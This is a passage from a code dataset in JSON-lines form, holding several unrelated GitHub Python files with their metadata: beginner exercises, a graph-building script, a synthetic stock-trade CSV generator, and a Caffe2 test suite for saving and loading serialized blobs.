Data.txt\",\"r\")\nMap=Map_File.readlines()\nnode_color=[]\nfor k in range(len(rangeo)):\n node_color.append(\"#00ff00\")\nCluster_to_Nodes=[]\nfor k in Map:\n SplitX=k.split(\"|\")\n ListFrom.append(SplitX[2].strip())\n ListTo.append(SplitX[0].strip())\n g.add_node(SplitX[0].strip(),color='yellow',title=SplitX[0].strip(),label=SplitX[1].strip(),shape=\"ellipse\")\n 
g.add_edge(SplitX[2].strip(),SplitX[0].strip(),color='red',width=2)\n edge_color.append(10)\n node_color.append(\"#4CAF50\")\n Cluster_to_Nodes.append([SplitX[0].strip(),SplitX[2].strip(),SplitX[1].strip()])\nMap_File.close()\ndf = pd.DataFrame({ 'from':ListFrom, 'to':ListTo, 'value':edge_color})\n # C1,C2\n # C2,C3\n # C4,C5\n # C1,C3\n# Build your graph\n\nfor m in Cluster_to_Cluster:\n print(m)\n\n\n# G=nx.from_pandas_edgelist(df, 'from', 'to', create_using=nx.Graph() )\n# # Custom the nodes:\n# nx.draw(G, with_labels=True,node_color=node_color, edge_color=df['value'],cmap=plt.get_cmap('jet'),\n# node_size=700, node_shape=\"o\", alpha=0.8,font_size=8, font_color=\"black\", font_weight=\"bold\")\n\n# g.show('Graph.html')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"TEMP_Graphpipeline.py","file_name":"TEMP_Graphpipeline.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25123229915","text":"# getting input from user\n\nname = input('what is your name? ')\nprint('Hi ' + name + ' welcome to the python3 world')\n\n# calculating the age of user\n\nbirth_year = input('when is your birthday? ' )\nage = 2019 - int(birth_year) # here we need to use int() to parse birth_year from string to integer\nprint(type(birth_year)) # type of birth_year, now you can undrestand why we need to parse it from strong to integer\nprint(type(age))\nprint(age)\n\n# long string \n\nemail = '''Dear pooya,\n\nthanks for your time, after careful consideration we are regret to inform you we can not move forward with your application.\n\nkind regards\nmars\n'''\n\nprint(email)","repo_name":"pouyapanahandeh/python3-ref","sub_path":"python-HR/appOne.py","file_name":"appOne.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11619107302","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime, timedelta\n\n\n\n\ndef random_datetime(start, end):\n delta = end - start\n random_days = np.random.uniform(0, delta.days)\n random_seconds = np.random.uniform(0, delta.seconds)\n return start + timedelta(days=random_days, seconds=random_seconds)\n\n\n\n\ndef generate():\n np.random.seed(42)\n rows = []\n stocks_holding = {} \n\n start_datetime = datetime(2023, 6, 1)\n end_datetime = datetime(2023, 6, 30)\n\n for i in range(1000):\n Datetime = random_datetime(start_datetime, end_datetime)\n\n stock = np.random.choice(['INFY', 'RELIANCE', 'TCS'])\n\n ordertype = np.random.choice(['Buy', 'Sell'])\n\n if ordertype == 'Buy':\n if stock in stocks_holding:\n\n continue\n else:\n\n quantity = round(np.random.uniform(10, 100))\n stocks_holding[stock] = quantity \n else:\n if stock in stocks_holding:\n\n quantity = stocks_holding[stock]\n stocks_holding.pop(stock) \n else:\n\n continue\n\n if stock == 'INFY':\n price = round(np.random.uniform(1200, 1500), 2)\n\n if stock == 'RELIANCE':\n price = round(np.random.uniform(2000, 3000), 2)\n\n if stock == 'TCS':\n price = round(np.random.uniform(3000, 4000), 2)\n\n exchange = 'NSE'\n rows.append([Datetime, stock, ordertype, price, quantity, exchange])\n\n df = pd.DataFrame(rows, columns=['datetime', 'stock', 'ordertype', 'price', 'quantity', 'Exchange'])\n df = df.sort_values(by='datetime').reset_index(drop=True) # Sort by datetime in increasing order\n df.to_csv('sample_data.csv', index=False)\n\nif(__name__==\"__main__\"):\n 
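    # generate() below seeds numpy, then emits up to 1000 rows: a Buy is
    # skipped when the stock is already held and a Sell when it is not, so the
    # resulting sample_data.csv is always a consistent buy-then-sell trade
    # log sorted by datetime.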
generate()\n","repo_name":"rajesh887/Financial_Analyzer-main","sub_path":"Financial_Analyzer-main/sample_data_generator.py","file_name":"sample_data_generator.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"38252786359","text":"#!/usr/bin/python3\n\ndef add_tuple(tuple_a=(), tuple_b=()):\n\n tuple_a_extended = tuple_a + (0, 0)\n tuple_b_extended = tuple_b + (0, 0)\n\n # Compute the sum of the first elements and the sum of the second elements\n sum_first = tuple_a_extended[0] + tuple_b_extended[0]\n sum_second = tuple_a_extended[1] + tuple_b_extended[1]\n\n # Return the resulting tuple\n return sum_first, sum_second\n","repo_name":"Avvyyy/alx-higher_level_programming","sub_path":"0x03-python-data_structures/7-add_tuple.py","file_name":"7-add_tuple.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14816441299","text":"import hypothesis.strategies as st\nfrom hypothesis import given, assume, settings\nimport io\nimport math\nimport numpy as np\nimport os\nimport struct\nimport unittest\nfrom pathlib import Path\nfrom typing import Dict, Generator, List, NamedTuple, Optional, Tuple, Type\nfrom caffe2.proto import caffe2_pb2\nfrom caffe2.proto.caffe2_pb2 import BlobSerializationOptions\nfrom caffe2.python import core, test_util, workspace\n\nif workspace.has_gpu_support:\n DEVICES = [caffe2_pb2.CPU, workspace.GpuDeviceType]\n max_gpuid = workspace.NumGpuDevices() - 1\nelse:\n DEVICES = [caffe2_pb2.CPU]\n max_gpuid = 0\n\n\nclass MiniDBEntry(NamedTuple):\n key: str\n value_size: int\n\n\n# Utility class for other loading tests, don't add test functions here\n# Inherit from this test instead. 
If you add a test here,\n# each derived class will inherit it as well and cause test duplication\nclass TestLoadSaveBase(test_util.TestCase):\n\n def __init__(self, methodName, db_type='minidb'):\n super().__init__(methodName)\n self._db_type = db_type\n\n @settings(deadline=None)\n @given(src_device_type=st.sampled_from(DEVICES),\n src_gpu_id=st.integers(min_value=0, max_value=max_gpuid),\n dst_device_type=st.sampled_from(DEVICES),\n dst_gpu_id=st.integers(min_value=0, max_value=max_gpuid))\n def load_save(self, src_device_type, src_gpu_id,\n dst_device_type, dst_gpu_id):\n workspace.ResetWorkspace()\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n assume(core.IsGPUDeviceType(src_device_type) or src_gpu_id == 0)\n assume(core.IsGPUDeviceType(dst_device_type) or dst_gpu_id == 0)\n src_device_option = core.DeviceOption(\n src_device_type, src_gpu_id)\n dst_device_option = core.DeviceOption(\n dst_device_type, dst_gpu_id)\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i), arr, src_device_option))\n self.assertTrue(workspace.HasBlob(str(i)))\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n op = core.CreateOperator(\n \"Save\",\n [str(i) for i in range(len(arrays))], [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type)\n self.assertTrue(workspace.RunOperatorOnce(op))\n\n # Reset the workspace so that anything we load is surely loaded\n # from the serialized proto.\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n\n def _LoadTest(keep_device, device_type, gpu_id, blobs, loadAll):\n \"\"\"A helper subfunction to test keep and not keep.\"\"\"\n op = core.CreateOperator(\n \"Load\",\n [], blobs,\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type,\n device_option=dst_device_option,\n keep_device=keep_device,\n load_all=loadAll)\n self.assertTrue(workspace.RunOperatorOnce(op))\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.HasBlob(str(i)))\n fetched = workspace.FetchBlob(str(i))\n self.assertEqual(fetched.dtype, arr.dtype)\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arr)\n proto = caffe2_pb2.BlobProto()\n proto.ParseFromString(workspace.SerializeBlob(str(i)))\n self.assertTrue(proto.HasField('tensor'))\n self.assertEqual(proto.tensor.device_detail.device_type,\n device_type)\n if core.IsGPUDeviceType(device_type):\n self.assertEqual(proto.tensor.device_detail.device_id,\n gpu_id)\n\n blobs = [str(i) for i in range(len(arrays))]\n # Load using device option stored in the proto, i.e.\n # src_device_option\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 0)\n # Load again, but this time load into dst_device_option.\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 0)\n # Load back to the src_device_option to see if both paths are able\n # to reallocate memory.\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 0)\n # Reset the workspace, and load directly into the dst_device_option.\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 0)\n\n # Test load all which loads all blobs in the db into the workspace.\n workspace.ResetWorkspace()\n _LoadTest(1, src_device_type, src_gpu_id, [], 1)\n # Load again making sure that overwrite functionality works.\n _LoadTest(1, src_device_type, src_gpu_id, [], 1)\n # Load again with different device.\n _LoadTest(0, 
dst_device_type, dst_gpu_id, [], 1)\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, [], 1)\n workspace.ResetWorkspace()\n _LoadTest(1, src_device_type, src_gpu_id, blobs, 1)\n workspace.ResetWorkspace()\n _LoadTest(0, dst_device_type, dst_gpu_id, blobs, 1)\n\n def saveFile(\n self, tmp_folder: Path, db_name: str, db_type: str, start_blob_id: int\n ) -> Tuple[str, List[np.ndarray]]:\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i + start_blob_id), arr))\n self.assertTrue(workspace.HasBlob(str(i + start_blob_id)))\n\n # Saves the blobs to a local db.\n tmp_file = str(tmp_folder / db_name)\n op = core.CreateOperator(\n \"Save\",\n [str(i + start_blob_id) for i in range(len(arrays))], [],\n absolute_path=1,\n db=tmp_file, db_type=db_type)\n workspace.RunOperatorOnce(op)\n return tmp_file, arrays\n\n\nclass TestLoadSave(TestLoadSaveBase):\n\n def testLoadSave(self):\n self.load_save()\n\n def testRepeatedArgs(self):\n dtypes = [np.float16, np.float32, np.float64, bool, np.int8,\n np.int16, np.int32, np.int64, np.uint8, np.uint16]\n arrays = [np.random.permutation(6).reshape(2, 3).astype(T)\n for T in dtypes]\n\n for i, arr in enumerate(arrays):\n self.assertTrue(workspace.FeedBlob(str(i), arr))\n self.assertTrue(workspace.HasBlob(str(i)))\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n op = core.CreateOperator(\n \"Save\",\n [str(i) for i in range(len(arrays))] * 2, [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"), db_type=self._db_type)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadExcessblobs(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))] * 2,\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(len(arrays) + i) for i in [-1, 0]],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.ResetWorkspace()\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(len(arrays) + i) for i in range(2)],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.ResetWorkspace()\n workspace.RunOperatorOnce(op)\n\n def testTruncatedFile(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n with open(tmp_file, 'wb+') as fdest:\n fdest.seek(20, os.SEEK_END)\n fdest.truncate()\n\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n db=tmp_file, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testBlobNameOverrides(self):\n original_names = ['blob_a', 'blob_b', 'blob_c']\n new_names = ['x', 'y', 'z']\n blobs = [np.random.permutation(6) for i in 
range(3)]\n for i, blob in enumerate(blobs):\n self.assertTrue(workspace.FeedBlob(original_names[i], blob))\n self.assertTrue(workspace.HasBlob(original_names[i]))\n self.assertEqual(len(workspace.Blobs()), 3)\n\n # Saves the blobs to a local db.\n tmp_folder = self.make_tempdir()\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Save\", original_names, [],\n absolute_path=1,\n strip_prefix='.temp',\n blob_name_overrides=new_names,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type\n )\n )\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Save\", original_names, [],\n absolute_path=1,\n blob_name_overrides=new_names,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type\n )\n )\n )\n self.assertTrue(workspace.ResetWorkspace())\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], [],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n load_all=1\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), 3)\n for i, name in enumerate(new_names):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n # moved here per @cxj's suggestion\n load_new_names = ['blob_x', 'blob_y', 'blob_z']\n # load 'x' into 'blob_x'\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], load_new_names[0:1],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n source_blob_names=new_names[0:1]\n )\n )\n )\n # we should have 'blob_a/b/c/' and 'blob_x' now\n self.assertEqual(len(workspace.Blobs()), 4)\n for i, name in enumerate(load_new_names[0:1]):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\", [], load_new_names[0:3],\n absolute_path=1,\n db=str(tmp_folder / \"db\"),\n db_type=self._db_type,\n source_blob_names=new_names[0:3]\n )\n )\n )\n # we should have 'blob_a/b/c/' and 'blob_x/y/z' now\n self.assertEqual(len(workspace.Blobs()), 6)\n for i, name in enumerate(load_new_names[0:3]):\n self.assertTrue(workspace.HasBlob(name))\n self.assertTrue((workspace.FetchBlob(name) == blobs[i]).all())\n\n def testMissingFile(self):\n tmp_folder = self.make_tempdir()\n tmp_file = tmp_folder / \"missing_db\"\n\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n db=str(tmp_file), db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n try:\n workspace.RunOperatorOnce(op)\n except RuntimeError as e:\n print(e)\n raise\n\n def testLoadMultipleFilesGivenSourceBlobNames(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(\n tmp_folder, \"db2\", self._db_type, len(arrays_1)\n )\n db_files = [db_file_1, db_file_2]\n blobs_names = [str(i) for i in range(len(arrays_1) + len(arrays_2))]\n\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\",\n [], blobs_names,\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n source_blob_names=blobs_names\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), len(blobs_names))\n for i in range(len(arrays_1)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arrays_1[i]\n )\n for i in range(len(arrays_2)):\n 
np.testing.assert_array_equal(\n workspace.FetchBlob(str(i + len(arrays_1))), arrays_2[i]\n )\n\n def testLoadAllMultipleFiles(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(\n tmp_folder, \"db2\", self._db_type, len(arrays_1)\n )\n db_files = [db_file_1, db_file_2]\n\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n self.assertTrue(\n workspace.RunOperatorOnce(\n core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=True\n )\n )\n )\n self.assertEqual(len(workspace.Blobs()), len(arrays_1) + len(arrays_2))\n for i in range(len(arrays_1)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i)), arrays_1[i]\n )\n for i in range(len(arrays_2)):\n np.testing.assert_array_equal(\n workspace.FetchBlob(str(i + len(arrays_1))), arrays_2[i]\n )\n\n def testLoadAllMultipleFilesWithSameKey(self):\n tmp_folder = self.make_tempdir()\n db_file_1, arrays_1 = self.saveFile(tmp_folder, \"db1\", self._db_type, 0)\n db_file_2, arrays_2 = self.saveFile(tmp_folder, \"db2\", self._db_type, 0)\n\n db_files = [db_file_1, db_file_2]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n op = core.CreateOperator(\n \"Load\",\n [], [],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=True)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadRepeatedFiles(self):\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n db_files = [tmp_file, tmp_file]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=False)\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def testLoadWithDBOptions(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file, arrays = self.saveFile(tmp_folder, \"db\", self._db_type, 0)\n\n db_files = [tmp_file, tmp_file]\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n\n db_options = b\"test_db_options\"\n op = core.CreateOperator(\n \"Load\",\n [], [str(i) for i in range(len(arrays))],\n absolute_path=1,\n dbs=db_files, db_type=self._db_type,\n load_all=False,\n db_options=db_options,\n )\n with self.assertRaises(RuntimeError):\n workspace.RunOperatorOnce(op)\n\n def create_test_blobs(\n self, size: int = 1234, feed: bool = True\n ) -> List[Tuple[str, np.ndarray]]:\n def int_array(dtype: Type[np.integer], size: int) -> np.ndarray:\n info = np.iinfo(dtype)\n return np.random.randint(info.min, info.max, size, dtype=dtype)\n\n def float_array(dtype: Type[np.floating], size: int) -> np.ndarray:\n return np.random.random_sample(size).astype(dtype)\n\n blobs = [\n (\"int8_data\", int_array(np.int8, size)),\n (\"int16_data\", int_array(np.int16, size)),\n (\"int32_data\", int_array(np.int32, size)),\n (\"int64_data\", int_array(np.int64, size)),\n (\"uint8_data\", int_array(np.uint8, size)),\n (\"uint16_data\", int_array(np.uint16, size)),\n (\"float16_data\", float_array(np.float16, size)),\n (\"float32_data\", float_array(np.float32, size)),\n (\"float64_data\", float_array(np.float64, size)),\n ]\n\n if feed:\n for name, data in blobs:\n workspace.FeedBlob(name, data)\n\n return blobs\n\n def load_blobs(\n self,\n blob_names: List[str],\n dbs: 
List[str],\n db_type: Optional[str] = None\n ) -> None:\n workspace.ResetWorkspace()\n self.assertEqual(len(workspace.Blobs()), 0)\n load_op = core.CreateOperator(\n \"Load\",\n [],\n blob_names,\n absolute_path=1,\n dbs=dbs,\n db_type=db_type or self._db_type,\n )\n self.assertTrue(workspace.RunOperatorOnce(load_op))\n self.assertEqual(len(workspace.Blobs()), len(blob_names))\n\n def load_and_check_blobs(\n self,\n blobs: List[Tuple[str, np.ndarray]],\n dbs: List[str],\n db_type: Optional[str] = None\n ) -> None:\n self.load_blobs([name for name, data in blobs], dbs, db_type)\n for name, data in blobs:\n np.testing.assert_array_equal(workspace.FetchBlob(name), data)\n\n def _read_minidb_entries(\n self, path: Path\n ) -> Generator[MiniDBEntry, None, None]:\n \"\"\"Read the entry information out of a minidb file.\n \"\"\"\n header = struct.Struct(\"=ii\")\n with path.open(\"rb\") as f:\n while True:\n buf = f.read(header.size)\n if not buf:\n break\n if len(buf) < header.size:\n raise Exception(\"early EOF in minidb header\")\n (key_len, value_len) = header.unpack(buf)\n if key_len < 0 or value_len < 0:\n raise Exception(\n f\"invalid minidb header: ({key_len}, {value_len})\"\n )\n key = f.read(key_len)\n if len(key) < key_len:\n raise Exception(\"early EOF in minidb key\")\n f.seek(value_len, io.SEEK_CUR)\n yield MiniDBEntry(key=key.decode(\"utf-8\"), value_size=value_len)\n\n def _read_chunk_info(self, path: Path) -> Dict[str, List[MiniDBEntry]]:\n \"\"\"Read a minidb file and return the names of each blob and how many\n chunks are stored for that blob.\n \"\"\"\n chunk_id_separator = \"#%\"\n results: Dict[str, List[MiniDBEntry]] = {}\n for entry in self._read_minidb_entries(path):\n parts = entry.key.rsplit(chunk_id_separator, 1)\n if len(parts) == 0:\n assert entry.key not in results\n results[entry.key] = [entry]\n else:\n blob_name = parts[0]\n results.setdefault(blob_name, [])\n results[blob_name].append(entry)\n\n return results\n\n def _test_save_with_chunk_size(\n self, num_elems: int, chunk_size: int, expected_num_chunks: int,\n ) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n blobs = self.create_test_blobs(num_elems)\n\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=chunk_size,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n for blob_name, chunks in blob_chunks.items():\n self.assertEqual(len(chunks), expected_num_chunks)\n\n def testSaveWithChunkSize(self) -> None:\n num_elems = 1234\n chunk_size = 32\n expected_num_chunks = math.ceil(num_elems / chunk_size)\n self._test_save_with_chunk_size(\n num_elems=num_elems,\n chunk_size=chunk_size,\n expected_num_chunks=expected_num_chunks,\n )\n\n def testSaveWithDefaultChunkSize(self) -> None:\n # This is the default value of the --caffe2_tensor_chunk_size flag from\n # core/blob_serialization.cc\n #\n # Test with just slightly more than this to ensure that 2 chunks are\n # used.\n default_chunk_size = 1000000\n self._test_save_with_chunk_size(\n num_elems=default_chunk_size + 10,\n chunk_size=-1,\n expected_num_chunks=2,\n )\n\n def testSaveWithNoChunking(self) -> None:\n default_chunk_size = 1000000\n self._test_save_with_chunk_size(\n num_elems=default_chunk_size + 10,\n chunk_size=0,\n expected_num_chunks=1,\n )\n\n def 
testSaveWithOptions(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n num_elems = 1234\n blobs = self.create_test_blobs(num_elems)\n\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=40,\n options=caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"int16_data\", chunk_size=10\n ),\n BlobSerializationOptions(\n blob_name_regex=\".*16_data\", chunk_size=20\n ),\n BlobSerializationOptions(\n blob_name_regex=\"float16_data\", chunk_size=30\n ),\n ],\n ),\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n # We explicitly set a chunk_size of 10 for int16_data\n self.assertEqual(\n len(blob_chunks[\"int16_data\"]), math.ceil(num_elems / 10)\n )\n # uint16_data should match the .*16_data pattern, and get a size of 20\n self.assertEqual(\n len(blob_chunks[\"uint16_data\"]), math.ceil(num_elems / 20)\n )\n # float16_data should also match the .*16_data pattern, and get a size\n # of 20. The explicitly float16_data rule came after the .*16_data\n # pattern, so it has lower precedence and will be ignored.\n self.assertEqual(\n len(blob_chunks[\"float16_data\"]), math.ceil(num_elems / 20)\n )\n # int64_data will get the default chunk_size of 40\n self.assertEqual(\n len(blob_chunks[\"int64_data\"]), math.ceil(num_elems / 40)\n )\n\n\n def testSaveWithDBOptions(self) -> None:\n num_elems = 1234\n chunk_size = 32\n expected_num_chunks = math.ceil(num_elems / chunk_size)\n\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n blobs = self.create_test_blobs(num_elems)\n\n db_options = b\"test_db_options\"\n # Saves the blobs to a local db.\n save_op = core.CreateOperator(\n \"Save\",\n [name for name, data in blobs],\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n chunk_size=chunk_size,\n db_options=db_options,\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n self.load_and_check_blobs(blobs, [tmp_file])\n\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n for blob_name, chunks in blob_chunks.items():\n self.assertEqual(len(chunks), expected_num_chunks)\n\n def testSaveFloatToBfloat16(self) -> None:\n tmp_folder = self.make_tempdir()\n tmp_file = str(tmp_folder / \"save.output\")\n\n # Create 2 blobs with the same float data\n float_data = np.random.random_sample(4000).astype(np.float32)\n workspace.FeedBlob(\"float1\", float_data)\n workspace.FeedBlob(\"float2\", float_data)\n blob_names = [\"float1\", \"float2\"]\n\n # Serialize the data, using bfloat16 serialization for one of the blobs\n save_op = core.CreateOperator(\n \"Save\",\n blob_names,\n [],\n absolute_path=1,\n db=tmp_file,\n db_type=self._db_type,\n options=caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"float1\",\n float_format=BlobSerializationOptions.FLOAT_BFLOAT16,\n ),\n ],\n ),\n )\n self.assertTrue(workspace.RunOperatorOnce(save_op))\n\n # As long as fbgemm was available for us to perform bfloat16 conversion,\n # the serialized data for float1 should be almost half the size of float2\n if workspace.has_fbgemm:\n blob_chunks = self._read_chunk_info(Path(tmp_file))\n self.assertEqual(len(blob_chunks[\"float1\"]), 1, blob_chunks[\"float1\"])\n 
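            # bfloat16 stores 2 bytes per element versus 4 for float32, so
            # roughly a 0.5 size ratio is expected; the 0.6 factor below
            # leaves slack for the fixed per-chunk protobuf framing overhead.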
self.assertEqual(len(blob_chunks[\"float2\"]), 1, blob_chunks[\"float2\"])\n self.assertLess(\n blob_chunks[\"float1\"][0].value_size,\n 0.6 * blob_chunks[\"float2\"][0].value_size\n )\n\n self.load_blobs(blob_names, [tmp_file])\n\n # float2 should be exactly the same as the input data\n np.testing.assert_array_equal(workspace.FetchBlob(\"float2\"), float_data)\n # float2 should be close-ish to the input data\n np.testing.assert_array_almost_equal(\n workspace.FetchBlob(\"float1\"), float_data, decimal=2\n )\n\n def testEstimateBlobSizes(self) -> None:\n # Create some blobs to test with\n float_data = np.random.random_sample(4000).astype(np.float32)\n workspace.FeedBlob(\"float1\", float_data)\n workspace.FeedBlob(\"float2\", float_data)\n workspace.FeedBlob(\n \"float3\", np.random.random_sample(2).astype(np.float32)\n )\n workspace.FeedBlob(\n \"ui16\", np.random.randint(0, 0xffff, size=1024, dtype=np.uint16)\n )\n\n # Estimate the serialized size of the data.\n # Request bfloat16 serialization for one of the float blobs, just to\n # exercise size estimation when using this option.\n options = caffe2_pb2.SerializationOptions(\n options=[\n BlobSerializationOptions(\n blob_name_regex=\"float1\",\n float_format=BlobSerializationOptions.FLOAT_BFLOAT16,\n chunk_size=500,\n ),\n ],\n )\n get_blobs_op = core.CreateOperator(\n \"EstimateAllBlobSizes\",\n [],\n [\"blob_names\", \"blob_sizes\"],\n options=options,\n )\n self.assertTrue(workspace.RunOperatorOnce(get_blobs_op))\n blob_names = workspace.FetchBlob(\"blob_names\")\n blob_sizes = workspace.FetchBlob(\"blob_sizes\")\n\n sizes_by_name: Dict[str, int] = {}\n for idx, name in enumerate(blob_names):\n sizes_by_name[name.decode(\"utf-8\")] = blob_sizes[idx]\n\n # Note that the output blob list will include our output blob names.\n expected_blobs = [\n \"float1\", \"float2\", \"float3\", \"ui16\",\n \"blob_names\", \"blob_sizes\"\n ]\n self.assertEqual(set(sizes_by_name.keys()), set(expected_blobs))\n\n def check_expected_blob_size(\n name: str, num_elems: int, elem_size: int, num_chunks: int = 1\n ) -> None:\n # The estimation code applies a fixed 40 byte per-chunk overhead to\n # account for the extra space required for other fixed TensorProto\n # message fields.\n per_chunk_overhead = 50\n expected_size = (\n (num_chunks * (len(name) + per_chunk_overhead))\n + (num_elems * elem_size)\n )\n self.assertEqual(\n sizes_by_name[name],\n expected_size,\n f\"expected size mismatch for {name}\"\n )\n\n check_expected_blob_size(\"ui16\", 1024, 3)\n check_expected_blob_size(\"float2\", 4000, 4)\n 